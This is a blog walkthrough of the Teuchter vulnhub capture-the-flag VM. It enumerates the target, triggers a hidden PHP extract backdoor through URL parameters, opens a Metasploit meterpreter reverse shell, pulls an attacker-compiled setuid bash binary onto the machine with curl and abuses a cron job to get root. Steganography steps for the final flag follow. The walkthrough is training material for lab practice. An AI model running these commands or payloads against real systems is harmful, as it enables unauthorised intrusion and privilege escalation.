Hacking Articles|Raj Chandel's Blog: Hack the Teuchter VM (CTF Challenge)

Hello friends!! Today we are going to solve latest CTF challenge “Teuchter” presented by vulnhub for penetration practice and design by knightmare. This virtual machine is having intermediate to medium difficulty level. One need to break into VM using web application and from there escalate privileges to gain root access.

Download it from here: https://www.vulnhub.com/entry/teuchter-03,163/

Penetrating Methodologies

§ Network Scanning (netdiscover, Nmap)

§ Abusing HTTP service for PHP extract backdoor

§ Compromise victim’s (Metasploit)

§ SUID Privilege escalation

§ Steganography for original flag.txt

Lets Start!!!

Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.104

Knowing port 80 is open in victim’s network I preferred to explore his IP in a browser. At first glance, we saw following web page. When couldn’t found something suspicious, so we try to check its source-code.

Hmmm!! After exploring source code page, you can analysis the “Green color text” sounds a little bit doubtful. Giving priority to /gallery /flicks and /telly we have considered them as the subjective web directories and then try to explore it in the web browser.

Also consider hint given for some extension like .pht for PHP.

So I opened the URL http://192.168.1.104/gallery/ but couldn’t get anything neither from its web page nor from its source code.

Then explored the URL http://192.168.1.104/telly/ and it put-up following web page in front of us and at looking at its page source code we notice something like flicks phpinfo.

So without wasting time we lunch directory brute-force attack on following URL for identify .php and .pht extension files.

dirb http:192.168.1.104/flicks/ -X .php, .pht

And from its result we find a phpinfo.pht file and explored it in the browser and it gives me an internal server error when I open it. So I search in Google phpinfo.php found this link: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

Thanks to Mr. Daniel B. Cid for sharing his experience because with help of above link we get the idea to exploit it. As the author has hidden the PHP extract backdoor inside the phpinfo.pht file and now whatever the attacker sends as “ctime” with “atime” as an argument it will be execute successfully.

As you can observe when we try to execute the system command “id” through the given below URL we got following result on the web page.

http:192.168.1.104/flicks/phpinfo.php?ctime=system&atime=id

Let’s compromise the victim’s VM to get the meterpreter shell, therefore, we load metasploit framework and execute below commands.

use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 1

msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 192.168.1.107

msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for malicious PHP code and Paste it inside URL as an argument.

You will get meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing flag.txt file. Further type following for extracting more information for post exploitation.

Here first I sysinfo command to enumerate install kernel version but didn’t found any working exploit for this VM therefore then I decide to go with manual approach for privilege escalation. Thus execute below commands:

cd /home

cd proclaimers

cd letterfromamerica

Here I found two files semaphore and test and if you will notice at their permissions then you will realize that SUID bit enabled for semaphore and GUID bit is enabled for test.

Now let access proper tty shell of victim’s VM and enumerate furthermore inside it.

shell

python3 -c "import pty; pty.spawn('/bin/bash');"

ooooh!! I got something suspicious from inside this path: /home/jkerr, a login.txt and promisedyouamiracle.jpg image. And after reading the note of the login.txt file I decided to download jpg image in our local machine.

Since the python 3 is already running therefore we execute following command for transferring file.

python3 -m http.server 8080

When we explored the promisedyouamiracle.jpg image in browser we got the following photo.

With help of exiftool we try to extract metadata from inside this image and luckily found the bas64 encoded text.

exiftool promisedyouamiracle.jpg

With the help of following command we try to decode the text and got “gemini” which could be possible password.

echo “Z2VtaW5pCg==” | base64 -d

Let try to login by using gemini as password for user: proclaimers because it holds two important files. Execute the following commands and extract the information.

su proclaimers

password: Gemini

cd proclaimers

cd letterfromamerica

ls -al

Ohhhh Great!! As declared above SUID bit enabled for the semaphore and GUID bit enabled for the test, let’s use grep command to get everything related to semaphore.

grep -R "semaphore" /usr/local 2>/dev/null

AwesomeJ, I got a script at this path /usr/local/bin/numpties.sh; let’s open it with cat command.

cat /usr/local/bin/numpties.sh

After reading it, I conclude that the cronjob will add the SUID bit to semaphore and also give root ownership to this file if the file exists.

No wonder, if I replace the original semaphore by the fake semaphore file then our fake file will get SUID permission. So in our local we write a C-program to get bsah shell and compile it.

include

#include

Int main ()

{

setuid(geteuid ());

system("/bin/bash");

}

gcc shell.c -o semaphore

python -m SimpleHTTPServer 80

Since we have complied file semaphores and also running python server therefore let’s download our fake semaphore at the place of original semaphores. Thus first I removed original semaphores and download complied file in same directory.

rm -rf semaphore

curl -O http://192.168.1.107/semaphore

After sometime when I checked the permission for the new semaphore I found the SUID bit was on. At that moment you should run the script which will give root terminal after getting executed and then look for flag inside /root directory.

ls -al

./semaphore

cd /root

cat flag.txt

This was not actual the flag let’s try to get the original flag

cd root

re-record-not-fade-away

ls -al

cd on

cd and

cd on

So on………… and at last you will get /ariston which holding a zip file “TeuchterESX.zip”.

cd ariston

Again run following command in current directory to transfer zip file.

python3 -m http.server 8080

Now download TeuchterESX.zip file in local machine and unzip it.

wget http://192.168.1.103:8080/ TeuchterESX.zip

unzip TeuchterESX.zip

password: Teuchter

We got a vmdk file and further ran following command to check list of present drive for mounting disk image.

fdisk -l

Here we saw /dev/sdb1 which looks good mounting disk image thus I install the vmfs-tools package.

So we have used vmfs-fuse to mount the drive and execute following commands:

mkdir Teuchter

vm-fuse /dev/sdb1 /root/Desktop/Teuchter/

cd Teuchter

cat hint.txt

In this text messages the author had given hint to check ISO for getting the password which is related to TV advert and it’s of 25 character.

So we mount the new folder /redkola.iso where we found an image file glass_ch.jpg with help of following command:

mount redkola.iso /root/Desktop/redkola

cd /root/Desktop/redkola

Further we opened the image “glass_ch.jpg” and it was a picture of Irn-Bru soft-drinks. Probably there could be chances of hidden text in this image therefore we tried steghide to extract out hidden text but when I execute following command it ask to enter some passphrase which we don’t know yet and it should above said 25 character which we need to be found.

steghide extract -sf glass_ch.jpg -xf /root/Desktop/finalflag.txt

Taking help of above hint and image I search Irn-bru-wiki and got this link https://en.wikipedia.org/wiki/Irn-Bru

And after spending a long time over wiki I got 25 character in ‘madeinscotlandfromgirders’, which was Irn-Bru advertising slogan and tried it as passphrase.